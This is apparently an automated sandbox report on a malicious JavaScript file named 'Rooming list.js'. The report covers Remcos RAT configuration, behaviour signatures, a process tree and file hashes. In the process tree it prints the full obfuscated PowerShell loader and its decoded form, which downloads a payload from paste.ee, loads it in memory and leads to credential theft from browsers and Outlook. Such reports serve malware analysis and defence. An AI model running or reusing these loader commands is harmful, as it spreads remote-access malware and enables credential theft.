Analysis

  • max time kernel
    148s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-11-2024 15:01

General

  • Target

    Rooming list.js

  • Size

    12KB

  • MD5

    caccefcdbbbfa170f1a4e378067649b1

  • SHA1

    2172ccb823996a86c57a098f2d4f65b38b872b03

  • SHA256

    d3fe61fd251583eae70dbc5ba508d0c30dda84d29be4d9449c038f8254ac9750

  • SHA512

    79fffd9df65c359350d7f54f60713418cdbd03effff0102ecd78ac796e741c4df5dd85488cce7047728e30423106bcfff5da4e47bdd49a77a06636d08edefa10

  • SSDEEP

    192:BQTkZ5u8Y1uj9DfT8Yt6LYVta9fX0l8ftHjymwLHmiDGSwKN4PzFwlIjpNLLdAqo:VzFQTLlbftHjsLHmiDGSwKKhLL/KQQz

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://paste.ee/d/7cWsL/0

exe.dropper

https://paste.ee/d/7cWsL/0

Extracted

Family

remcos

Botnet

Another

C2

closen.kozow.com:2404

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-7TC8FJ

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe "C:\Users\Admin\AppData\Local\Temp\Rooming list.js"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3652
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $teste_EmzoE = 'J⚑B1⚑HI⚑b⚑⚑g⚑D0⚑I⚑⚑n⚑Gg⚑d⚑B0⚑H⚑⚑cw⚑6⚑C8⚑LwBw⚑GE⚑cwB0⚑GU⚑LgBl⚑GU⚑LwBk⚑C8⚑NwBj⚑Fc⚑cwBM⚑C8⚑M⚑⚑n⚑Ds⚑J⚑B3⚑GU⚑YgBD⚑Gw⚑aQBl⚑G4⚑d⚑⚑g⚑D0⚑I⚑BO⚑GU⚑dw⚑t⚑E8⚑YgBq⚑GU⚑YwB0⚑C⚑⚑UwB5⚑HM⚑d⚑Bl⚑G0⚑LgBO⚑GU⚑d⚑⚑u⚑Fc⚑ZQBi⚑EM⚑b⚑Bp⚑GU⚑bgB0⚑Ds⚑J⚑Bi⚑GE⚑cwBl⚑DY⚑N⚑BD⚑G8⚑bgB0⚑GU⚑bgB0⚑C⚑⚑PQ⚑g⚑Fs⚑UwB5⚑HM⚑d⚑Bl⚑G0⚑LgBU⚑GU⚑e⚑B0⚑C4⚑RQBu⚑GM⚑bwBk⚑Gk⚑bgBn⚑F0⚑Og⚑6⚑FU⚑V⚑BG⚑Dg⚑LgBH⚑GU⚑d⚑BT⚑HQ⚑cgBp⚑G4⚑Zw⚑o⚑CQ⚑dwBl⚑GI⚑QwBs⚑Gk⚑ZQBu⚑HQ⚑LgBE⚑G8⚑dwBu⚑Gw⚑bwBh⚑GQ⚑R⚑Bh⚑HQ⚑YQ⚑o⚑CQ⚑dQBy⚑Gw⚑KQ⚑p⚑Ds⚑J⚑Bi⚑GE⚑cwBl⚑DY⚑N⚑BD⚑G8⚑bgB0⚑GU⚑bgB0⚑C⚑⚑PQ⚑g⚑CQ⚑YgBh⚑HM⚑ZQ⚑2⚑DQ⚑QwBv⚑G4⚑d⚑Bl⚑G4⚑d⚑⚑g⚑C0⚑cgBl⚑H⚑⚑b⚑Bh⚑GM⚑ZQ⚑g⚑Cc⚑kyE6⚑JMhJw⚑s⚑C⚑⚑JwBB⚑Cc⚑Ow⚑k⚑GI⚑aQBu⚑GE⚑cgB5⚑EM⚑bwBu⚑HQ⚑ZQBu⚑HQ⚑I⚑⚑9⚑C⚑⚑WwBT⚑Hk⚑cwB0⚑GU⚑bQ⚑u⚑EM⚑bwBu⚑HY⚑ZQBy⚑HQ⚑XQ⚑6⚑Do⚑RgBy⚑G8⚑bQBC⚑GE⚑cwBl⚑DY⚑N⚑BT⚑HQ⚑cgBp⚑G4⚑Zw⚑o⚑CQ⚑YgBh⚑HM⚑ZQ⚑2⚑DQ⚑QwBv⚑G4⚑d⚑Bl⚑G4⚑d⚑⚑p⚑Ds⚑J⚑Bh⚑HM⚑cwBl⚑G0⚑YgBs⚑Hk⚑I⚑⚑9⚑C⚑⚑WwBS⚑GU⚑ZgBs⚑GU⚑YwB0⚑Gk⚑bwBu⚑C4⚑QQBz⚑HM⚑ZQBt⚑GI⚑b⚑B5⚑F0⚑Og⚑6⚑Ew⚑bwBh⚑GQ⚑K⚑⚑k⚑GI⚑aQBu⚑GE⚑cgB5⚑EM⚑bwBu⚑HQ⚑ZQBu⚑HQ⚑KQ⚑7⚑CQ⚑d⚑B5⚑H⚑⚑ZQ⚑g⚑D0⚑I⚑⚑k⚑GE⚑cwBz⚑GU⚑bQBi⚑Gw⚑eQ⚑u⚑Ec⚑ZQB0⚑FQ⚑eQBw⚑GU⚑K⚑⚑n⚑EM⚑b⚑Bh⚑HM⚑cwBM⚑Gk⚑YgBy⚑GE⚑cgB5⚑DM⚑LgBD⚑Gw⚑YQBz⚑HM⚑MQ⚑n⚑Ck⚑Ow⚑k⚑G0⚑ZQB0⚑Gg⚑bwBk⚑C⚑⚑PQ⚑g⚑CQ⚑d⚑B5⚑H⚑⚑ZQ⚑u⚑Ec⚑ZQB0⚑E0⚑ZQB0⚑Gg⚑bwBk⚑Cg⚑JwBw⚑HI⚑RgBW⚑Ek⚑Jw⚑p⚑Ds⚑J⚑Bw⚑GE⚑cgBh⚑G0⚑cw⚑g⚑D0⚑I⚑B⚑⚑Cg⚑Jw⚑w⚑C8⚑UgBT⚑DY⚑O⚑⚑z⚑C8⚑Z⚑⚑v⚑GU⚑ZQ⚑u⚑GU⚑d⚑Bz⚑GE⚑c⚑⚑v⚑C8⚑OgBz⚑H⚑⚑d⚑B0⚑Gg⚑Jw⚑g⚑Cw⚑I⚑⚑k⚑Fg⚑a⚑BS⚑FQ⚑bw⚑g⚑Cw⚑I⚑⚑n⚑GY⚑YQBs⚑HM⚑ZQ⚑n⚑C⚑⚑KQ⚑7⚑CQ⚑bQBl⚑HQ⚑a⚑Bv⚑GQ⚑LgBJ⚑G4⚑dgBv⚑Gs⚑ZQ⚑o⚑CQ⚑bgB1⚑Gw⚑b⚑⚑s⚑C⚑⚑J⚑Bw⚑GE⚑cgBh⚑G0⚑cw⚑p⚑⚑==';$teste_EmzoE = $teste_EmzoE.replace('⚑','A');$teste_EmzoE = [System.Convert]::FromBase64String( $teste_EmzoE ) ;$teste_EmzoE = [System.Text.Encoding]::Unicode.GetString( $teste_EmzoE );$teste_EmzoE = $teste_EmzoE.replace('%DCPJU%','C:\Users\Admin\AppData\Local\Temp\Rooming list.js');powershell $teste_EmzoE
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4640
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$url = 'https://paste.ee/d/7cWsL/0';$webClient = New-Object System.Net.WebClient;$base64Content = [System.Text.Encoding]::UTF8.GetString($webClient.DownloadData($url));$base64Content = $base64Content -replace '↓:↓', 'A';$binaryContent = [System.Convert]::FromBase64String($base64Content);$assembly = [Reflection.Assembly]::Load($binaryContent);$type = $assembly.GetType('ClassLibrary3.Class1');$method = $type.GetMethod('prFVI');$params = @('0/RS683/d/ee.etsap//:sptth' , $XhRTo , 'false' );$method.Invoke($null, $params)"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1228
        • C:\Windows\SYSTEM32\cmd.exe
          cmd.exe /c del ""
          4⤵
            PID:4912
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\sfxgp.ps1"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:512
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
              5⤵
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:5116
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\idfujrw"
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:2780
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\sysnjjoedh"
                6⤵
                • Accesses Microsoft Outlook accounts
                • System Location Discovery: System Language Discovery
                PID:1020
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\dayfkuzgrpjzdh"
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3232

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\remcos\logs.dat

      Filesize

      144B

      MD5

      ecfd1f85047fe645631c2a2e03e6f5e2

      SHA1

      6265aff6154a68ad59ba008100ff5d56be95adfb

      SHA256

      db26db11a7e96d26f4a3d39a64ec2b18615946e894bbaaba802328a5be262e21

      SHA512

      d743bf160fa7061302e4dcce0a852c377415febbb154424f53e0721046d5e0d3beb41ee69b274255e724af85706dad113e05772764465bf6161ca82bfa9064a2

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      3KB

      MD5

      771d07836d7ed3e723f2c9b06f4a6f15

      SHA1

      53c3edbcdc7eb19d204477c560bc49b033fee40d

      SHA256

      d46ee2c80d88a87a2396b86d699e1455c81ea831dbc25c95bea311bed379d5fc

      SHA512

      1273667a788d3e63c6f5841f6885b4f4dd7625b7ffa47c8b077c4063e7c155b322ca66be1be4d273dfd93dec4003d2b61a6f8c4c0095e0647a063fe2c5396875

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      64B

      MD5

      d8b9a260789a22d72263ef3bb119108c

      SHA1

      376a9bd48726f422679f2cd65003442c0b6f6dd5

      SHA256

      d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

      SHA512

      550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qtwu5lhd.xxy.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\idfujrw

      Filesize

      4KB

      MD5

      60a0bdc1cf495566ff810105d728af4a

      SHA1

      243403c535f37a1f3d5f307fc3fb8bdd5cbcf6e6

      SHA256

      fd12da9f9b031f9fa742fa73bbb2c9265f84f49069b7c503e512427b93bce6d2

      SHA512

      4445f214dbf5a01d703f22a848b56866f3f37b399de503f99d40448dc86459bf49d1fa487231f23c080a559017d72bcd9f6c13562e1f0bd53c1c9a89e73306a5

    • C:\Users\Admin\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\sfxgp.ps1

      Filesize

      1.8MB

      MD5

      f881d4ab733669a330ebf35c80e5c4a3

      SHA1

      801b3ebc541aa5d19a8358db1ed580ecc6a3dcd9

      SHA256

      a985294a2229289d87d5c58676000ed01df361b6c54c7edf3a87d36df2a83da6

      SHA512

      08113fe2f38411c46b04fc865261f818a8618938dfb08ec8a957c22ec1748c4bc564dcc1779cb840760afd74818952b1a82914dedd05de3313607aa73646cb96

    • memory/512-45-0x000001F74A000000-0x000001F74A00E000-memory.dmp

      Filesize

      56KB

    • memory/1020-66-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

    • memory/1020-71-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

    • memory/1020-61-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

    • memory/1228-26-0x0000018F4B1F0000-0x0000018F4B40C000-memory.dmp

      Filesize

      2.1MB

    • memory/1228-22-0x0000018F32B80000-0x0000018F32B8A000-memory.dmp

      Filesize

      40KB

    • memory/2780-63-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

    • memory/2780-60-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

    • memory/2780-67-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

    • memory/3232-64-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

    • memory/3232-65-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

    • memory/3232-62-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

    • memory/4640-11-0x00007FFD41BF0000-0x00007FFD426B1000-memory.dmp

      Filesize

      10.8MB

    • memory/4640-30-0x0000016AA2C00000-0x0000016AA2E1C000-memory.dmp

      Filesize

      2.1MB

    • memory/4640-10-0x0000016A8A650000-0x0000016A8A672000-memory.dmp

      Filesize

      136KB

    • memory/4640-12-0x00007FFD41BF0000-0x00007FFD426B1000-memory.dmp

      Filesize

      10.8MB

    • memory/4640-0-0x00007FFD41BF3000-0x00007FFD41BF5000-memory.dmp

      Filesize

      8KB

    • memory/4640-31-0x00007FFD41BF0000-0x00007FFD426B1000-memory.dmp

      Filesize

      10.8MB

    • memory/5116-59-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/5116-57-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/5116-56-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/5116-54-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/5116-55-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/5116-53-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/5116-52-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/5116-49-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/5116-48-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/5116-74-0x0000000010000000-0x0000000010019000-memory.dmp

      Filesize

      100KB

    • memory/5116-77-0x0000000010000000-0x0000000010019000-memory.dmp

      Filesize

      100KB

    • memory/5116-78-0x0000000010000000-0x0000000010019000-memory.dmp

      Filesize

      100KB

    • memory/5116-79-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/5116-83-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/5116-84-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/5116-46-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/5116-92-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/5116-91-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/5116-99-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/5116-100-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/5116-107-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/5116-108-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/5116-115-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB